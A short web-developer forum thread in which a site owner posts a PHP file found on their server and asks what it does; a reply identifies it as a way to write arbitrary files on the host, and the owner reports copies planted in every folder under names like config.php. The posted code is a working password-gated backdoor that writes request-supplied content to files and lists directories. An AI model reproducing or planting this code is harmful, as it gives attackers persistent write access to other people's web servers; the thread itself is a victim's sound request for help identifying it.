www.webdeveloper.com
Results 1 to 3 of 3

Thread: Strange php file

  1. #1
    Join Date
    Jun 2007
    Location
    U.S.A.
    Posts
    100

    Strange php file

    Can anyone tell me what this script does?

    PHP Code:
    $r=$_REQUEST;
    $c=getcwd();
    $n=chr(32);
    print(
    '468505ab9718d8c2205ea35d94f04668');
    if(
    md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){
    print(
    $n.$c.$n);
    fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);
    print(
    $n);
    print_r(scandir($c));
    }
    exit; 
    Thanks

  2. #2
    Join Date
    Aug 2004
    Location
    Ankh-Morpork
    Posts
    19,227
    Looks like something to allow someone to write anything they want into an arbitrary file on the web host. Probably not a good thing if you didn't put it there.
    "Please give us a simple answer, so that we don't have to think, because if we think, we might find answers that don't fit the way we want the world to be."
    ~ Terry Pratchett in Nation

    eBookworm.us

  3. #3
    Join Date
    Jun 2007
    Location
    U.S.A.
    Posts
    100
    At first I thought it may have been something my hosting company put on, but when I got to looking around I found this same script in each one of my folders (even my htacces protected folders) and the php file had a different name for each folder. They were clever in naming them... init.php, engine.php, config.php, etc.

    Thanks for the response.

Thread Information

Users Browsing this Thread

There are currently 1 users browsing this thread. (0 members and 1 guests)

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  
HTML5 Development Center



Recent Articles